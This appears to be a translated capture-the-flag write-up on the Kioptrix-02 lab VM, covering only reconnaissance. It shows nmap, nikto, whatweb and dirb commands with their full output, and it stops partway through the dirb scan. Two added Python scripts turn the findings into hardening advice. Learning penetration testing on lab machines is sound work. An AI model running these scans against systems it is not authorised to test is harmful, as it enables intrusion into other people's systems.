The Kioptrix-02 Story: Never Trust, Always Verify

The Kioptrix series written by loneferret continues with its second release. The important information-security lesson to remember in this installment is: do not trust any user of your web application. In short, the principle reads "Never Trust, Always Verify". Let us follow the short journey of hunting for vulnerabilities on the Kioptrix-02 machine. As in the previous story, this one is divided into three phases: Scanning and Enumeration, Mapping the Attack Surface, and Exploitation and Post-Exploitation.

Through this story, all Electronic System Operators are encouraged to remain vigilant about vulnerabilities in their systems, bearing in mind that Article 11 of Government Regulation No. 71 of 2019 on the Operation of Electronic Systems and Transactions mandates that they be able to guarantee the security of the Electronic Systems they manage.

Phase One: Scanning and Enumeration

The tool we use in this information-gathering phase is nmap, which became popular after it appeared in the Hollywood film The Matrix. According to the information it gathered, the Kioptrix-02 machine's main role is a web server running Apache (2.0.52) with MySQL (version not yet known) as its database, on a CentOS operating system (version not yet known). Here is the information nmap collected:

root@kali2:~# nmap -p- -A 192.168.216.148
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-18 20:06 PDT
Nmap scan report for 192.168.216.148 (192.168.216.148)
Host is up (0.00073s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            652/udp  status
|_  100024  1            655/tcp  status
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-19T14:07:01+00:00; +10h59m40s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
655/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:3F:59:E2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 10h59m39s, deviation: 0s, median: 10h59m39s

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.216.148 (192.168.216.148)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.59 seconds
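To turn a scan like the one above into a hardening list, here is an added Python example (not from the original post): it parses the nmap -A text format and flags the legacy protocols and network-exposed services the output reveals. The sample text is a constructed excerpt of the scan above; the remediation hints are the editor's suggestions, not something the post states.

```python
"""Added example: triage nmap -A text output for legacy-protocol exposure.

Parses the port table and NSE script lines, then maps what they reveal
(SSHv1, SSLv2, risky HTTP methods, network-exposed MySQL/rpcbind) to
hardening findings. Remediation hints are the editor's suggestions.
"""
import re

# Constructed sample: an excerpt of the nmap -A output shown above.
SAMPLE_NMAP = """\
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
3306/tcp open  mysql      MySQL (unauthorized)
"""

# "<port>/<proto>  <state>  <service>  <version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port line. NSE script lines ('|' prefixed) are
    attached to the port they follow, with '|', '_' and indentation stripped."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            }
            ports.append(current)
        elif line.startswith("|") and current is not None:
            current["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def triage(ports):
    """Map banners and script output to (port, finding) pairs, in port order."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        tag = f"{p['port']}/{p['proto']}"
        scripts = " ".join(p["scripts"])
        if "Server supports SSHv1" in scripts:
            findings.append((tag, "SSHv1 enabled; allow protocol 2 only (Protocol 2 in sshd_config)"))
        if p["service"] == "rpcbind":
            findings.append((tag, "rpcbind reachable; disable portmap or restrict it with a host firewall"))
        if "SSLv2 supported" in scripts:
            n = sum(s.startswith("SSL2_") for s in p["scripts"])
            findings.append((tag, f"SSLv2 offered ({n} ciphers); set SSLProtocol all -SSLv2 -SSLv3"))
        m = re.search(r"Potentially risky methods: (.+)", scripts)
        if m:
            findings.append((tag, f"risky HTTP methods allowed: {m.group(1).strip()}"))
        if p["service"] == "mysql":
            findings.append((tag, "MySQL listening on the network; bind-address=127.0.0.1 unless remote access is required"))
    return findings


if __name__ == "__main__":
    for tag, finding in triage(parse_ports(SAMPLE_NMAP)):
        print(f"{tag:9} {finding}")
```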


The information gathered so far is sufficient, but the HTTP service needs further enumeration. For that we use nikto, whatweb and dirb. From what these three tools gathered there are a few additional details: the language used is PHP (version 4.3.9), and a number of directories are exposed to the internet, notably the manual folder.

root@kali2:~# nikto -h http://192.168.216.148/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.216.148
+ Target Hostname:    192.168.216.148
+ Target Port:        80
+ Start Time:         2020-04-18 20:21:45 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 10:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-04-18 20:22:30 (GMT-7) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali2:~# whatweb http://192.168.216.148 -v
WhatWeb report for http://192.168.216.148
Status    : 200 OK
Title     : <None>
IP        : 192.168.216.148
Country   : RESERVED, ZZ

Summary   : HTTPServer[CentOS][Apache/2.0.52 (CentOS)], X-Powered-By[PHP/4.3.9], Apache[2.0.52], PasswordField[psw], PHP[4.3.9]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.0.52 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : CentOS
	String       : Apache/2.0.52 (CentOS) (from server string)

[ PHP ]
	PHP is a widely-used general-purpose scripting language 
	that is especially suited for Web development and can be 
	embedded into HTML. This plugin identifies PHP errors, 
	modules and versions and extracts the local file path and 
	username if present. 

	Version      : 4.3.9
	Google Dorks: (2)
	Website     : http://www.php.net/

[ PasswordField ]
	find password fields 

	String       : psw (from field name)

[ X-Powered-By ]
	X-Powered-By HTTP header 

	String       : PHP/4.3.9 (from x-powered-by string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sun, 19 Apr 2020 15:20:13 GMT
	Server: Apache/2.0.52 (CentOS)
	X-Powered-By: PHP/4.3.9
	Content-Length: 667
	Connection: close
	Content-Type: text/html; charset=UTF-8

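As an added example (not part of the original post), the following Python check evaluates the response head whatweb captured above against the gaps nikto reported and maps each to an Apache or php.ini setting. The Allow header value is assumed from nikto's "Allowed HTTP Methods" line (the raw header is not on the page); the directives are standard core, mod_headers and php.ini settings.

```python
"""Added example: audit a captured HTTP response head for the hardening gaps
nikto reported, and map each gap to an Apache/PHP setting.

The response head is the one whatweb printed above; the Allow header value
is assumed from nikto's 'Allowed HTTP Methods' line.
"""
import re

# Constructed sample: whatweb's captured headers plus an assumed Allow header.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Date: Sun, 19 Apr 2020 15:20:13 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Allow: GET, HEAD, POST, OPTIONS, TRACE
Content-Length: 667
Connection: close
Content-Type: text/html; charset=UTF-8
"""

# Headers nikto flagged as absent, with the mod_headers directive that adds them.
# X-XSS-Protection is a legacy check; a Content-Security-Policy is the modern control.
REQUIRED_HEADERS = {
    "x-frame-options": 'Header always set X-Frame-Options "SAMEORIGIN"',
    "x-content-type-options": 'Header always set X-Content-Type-Options "nosniff"',
    "x-xss-protection": 'Header always set X-XSS-Protection "1; mode=block"',
}

MIN_APACHE = (2, 4)  # nikto's note: 2.2.34 is the end of life for the 2.x branch


def parse_response(raw):
    """Split a raw response head into (status line, {lower-case name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def apache_version(server_header):
    """Extract (major, minor, patch) from 'Apache/2.0.52 (CentOS)', or None."""
    m = re.match(r"Apache/(\d+)\.(\d+)\.(\d+)", server_header)
    return tuple(int(x) for x in m.groups()) if m else None


def audit(headers):
    """Return (finding, remediation) pairs; an empty list means no gap found."""
    out = []
    allow = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    if "TRACE" in allow:
        out.append(("TRACE enabled (cross-site tracing)", "TraceEnable Off"))
    server = headers.get("server", "")
    if re.search(r"/\d", server):  # any product/version token is a disclosure
        out.append((f"Server banner discloses version: {server}",
                    "ServerTokens Prod + ServerSignature Off"))
    ver = apache_version(server)
    if ver is not None and ver[:2] < MIN_APACHE:
        out.append((f"Apache {'.'.join(map(str, ver))} is end-of-life",
                    "upgrade to a supported 2.4.x release"))
    if "x-powered-by" in headers:
        out.append((f"X-Powered-By discloses {headers['x-powered-by']}",
                    "expose_php = Off in php.ini"))
    for name, directive in REQUIRED_HEADERS.items():
        if name not in headers:
            out.append((f"missing {name} header", directive))
    return out


if __name__ == "__main__":
    status, hdrs = parse_response(SAMPLE_RESPONSE)
    print(status)
    for finding, fix in audit(hdrs):
        print(f"- {finding}\n    fix: {fix}")
```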
root@kali2:~/Documents# dirb http://192.168.216.148

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Apr 18 21:12:36 2020
URL_BASE: http://192.168.216.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.216.148/ ----
+ http://192.168.216.148/cgi-bin/ (CODE:403|SIZE:291)                                               
+ http://192.168.216.148/index.php (CODE:200|SIZE:667)                                              
==> DIRECTORY: http://192.168.216.148/manual/                                                       
+ http://192.168.216.148/usage (CODE:403|SIZE:288)                                                  
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ ----
==> DIRECTORY: http://192.168.216.148/manual/de/                                                    
==> DIRECTORY: http://192.168.216.148/manual/developer/                                             
==> DIRECTORY: http://192.168.216.148/manual/en/                                                    
==> DIRECTORY: http://192.168.216.148/manual/faq/                                                   
==> DIRECTORY: http://192.168.216.148/manual/fr/                                                    
==> DIRECTORY: http://192.168.216.148/manual/howto/                                                 
==> DIRECTORY: http://192.168.216.148/manual/images/                                                
+ http://192.168.216.148/manual/index.html (CODE:200|SIZE:7234)                                     
==> DIRECTORY: http://192.168.216.148/manual/ja/                                                    
==> DIRECTORY: http://192.168.216.148/manual/ko/                                                    
+ http://192.168.216.148/manual/LICENSE (CODE:200|SIZE:11358)                                       
==> DIRECTORY: http://192.168.216.148/manual/misc/                                                  
==> DIRECTORY: http://192.168.216.148/manual/mod/                                                   
==> DIRECTORY: http://192.168.216.148/manual/programs/                                              
==> DIRECTORY: http://192.168.216.148/manual/ru/                                                    
==> DIRECTORY: http://192.168.216.148/manual/ssl/                                                   
==> DIRECTORY: http://192.168.216.148/manual/style/                                                 
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/ ----
+ http://192.168.216.148/manual/de/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/developer/                                          
+ http://192.168.216.148/manual/de/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/faq/                                                
+ http://192.168.216.148/manual/de/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/de/images/                                             
+ http://192.168.216.148/manual/de/index.html (CODE:200|SIZE:7317)                                  
+ http://192.168.216.148/manual/de/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/de/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/de/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/de/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/de/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/de/programs/                                           
+ http://192.168.216.148/manual/de/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/de/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/developer/ ----
+ http://192.168.216.148/manual/developer/index.html (CODE:200|SIZE:4770)                           
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/ ----
+ http://192.168.216.148/manual/en/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/developer/                                          
+ http://192.168.216.148/manual/en/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/faq/                                                
+ http://192.168.216.148/manual/en/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/en/images/                                             
+ http://192.168.216.148/manual/en/index.html (CODE:200|SIZE:7234)                                  
+ http://192.168.216.148/manual/en/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/en/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/en/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/en/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/en/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/en/programs/                                           
+ http://192.168.216.148/manual/en/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/en/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/faq/ ----
+ http://192.168.216.148/manual/faq/index.html (CODE:200|SIZE:3564)                                 
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/ ----
+ http://192.168.216.148/manual/fr/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/developer/                                          
+ http://192.168.216.148/manual/fr/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/faq/                                                
+ http://192.168.216.148/manual/fr/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/fr/images/                                             
+ http://192.168.216.148/manual/fr/index.html (CODE:200|SIZE:7234)                                  
+ http://192.168.216.148/manual/fr/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/fr/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/fr/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/fr/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/fr/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/fr/programs/                                           
+ http://192.168.216.148/manual/fr/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/fr/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/howto/ ----
+ http://192.168.216.148/manual/howto/index.html (CODE:200|SIZE:5685)                               
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/ ----
+ http://192.168.216.148/manual/ja/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/developer/                                          
+ http://192.168.216.148/manual/ja/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/faq/                                                
+ http://192.168.216.148/manual/ja/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/ja/images/                                             
+ http://192.168.216.148/manual/ja/index.html (CODE:200|SIZE:7227)                                  
+ http://192.168.216.148/manual/ja/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ja/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ja/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/ja/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/ja/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/ja/programs/                                           
+ http://192.168.216.148/manual/ja/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/ja/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/ ----
+ http://192.168.216.148/manual/ko/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/developer/                                          
+ http://192.168.216.148/manual/ko/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/faq/                                                
+ http://192.168.216.148/manual/ko/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/ko/images/                                             
+ http://192.168.216.148/manual/ko/index.html (CODE:200|SIZE:6954)                                  
+ http://192.168.216.148/manual/ko/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ko/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ko/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/ko/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/ko/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/ko/programs/                                           
+ http://192.168.216.148/manual/ko/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/ko/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/misc/ ----
+ http://192.168.216.148/manual/misc/index.html (CODE:200|SIZE:5491)                                
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/mod/ ----
+ http://192.168.216.148/manual/mod/index.html (CODE:200|SIZE:13437)                                
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/programs/ ----
+ http://192.168.216.148/manual/programs/index.html (CODE:200|SIZE:4664)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/ ----
+ http://192.168.216.148/manual/ru/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.216.148/manual/ru/developer/                                          
+ http://192.168.216.148/manual/ru/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/faq/                                                
+ http://192.168.216.148/manual/ru/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/ru/images/                                             
+ http://192.168.216.148/manual/ru/index.html (CODE:200|SIZE:7277)                                  
+ http://192.168.216.148/manual/ru/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ru/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ru/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/ru/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/ru/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/ru/programs/                                           
+ http://192.168.216.148/manual/ru/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/ru/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ssl/ ----
+ http://192.168.216.148/manual/ssl/index.html (CODE:200|SIZE:3988)                                 
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/developer/ ----
+ http://192.168.216.148/manual/de/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/faq/ ----
+ http://192.168.216.148/manual/de/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/howto/ ----
+ http://192.168.216.148/manual/de/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/misc/ ----
+ http://192.168.216.148/manual/de/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/mod/ ----
+ http://192.168.216.148/manual/de/mod/index.html (CODE:200|SIZE:13561)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/programs/ ----
+ http://192.168.216.148/manual/de/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/ssl/ ----
+ http://192.168.216.148/manual/de/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/developer/ ----
+ http://192.168.216.148/manual/en/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/faq/ ----
+ http://192.168.216.148/manual/en/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/howto/ ----
+ http://192.168.216.148/manual/en/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/misc/ ----
+ http://192.168.216.148/manual/en/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/mod/ ----
+ http://192.168.216.148/manual/en/mod/index.html (CODE:200|SIZE:13437)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/programs/ ----
+ http://192.168.216.148/manual/en/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/ssl/ ----
+ http://192.168.216.148/manual/en/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/developer/ ----
+ http://192.168.216.148/manual/fr/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/faq/ ----
+ http://192.168.216.148/manual/fr/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/howto/ ----
+ http://192.168.216.148/manual/fr/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/misc/ ----
+ http://192.168.216.148/manual/fr/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/mod/ ----
+ http://192.168.216.148/manual/fr/mod/index.html (CODE:200|SIZE:13437)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/programs/ ----
+ http://192.168.216.148/manual/fr/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/ssl/ ----
+ http://192.168.216.148/manual/fr/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/developer/ ----
+ http://192.168.216.148/manual/ja/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/faq/ ----
+ http://192.168.216.148/manual/ja/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/howto/ ----
+ http://192.168.216.148/manual/ja/howto/index.html (CODE:200|SIZE:5607)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/misc/ ----
+ http://192.168.216.148/manual/ja/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/mod/ ----
+ http://192.168.216.148/manual/ja/mod/index.html (CODE:200|SIZE:13298)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/programs/ ----
+ http://192.168.216.148/manual/ja/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/ssl/ ----
+ http://192.168.216.148/manual/ja/ssl/index.html (CODE:200|SIZE:3957)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/developer/ ----
+ http://192.168.216.148/manual/ko/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/faq/ ----
+ http://192.168.216.148/manual/ko/faq/index.html (CODE:200|SIZE:3371)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/howto/ ----
+ http://192.168.216.148/manual/ko/howto/index.html (CODE:200|SIZE:5299)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/misc/ ----
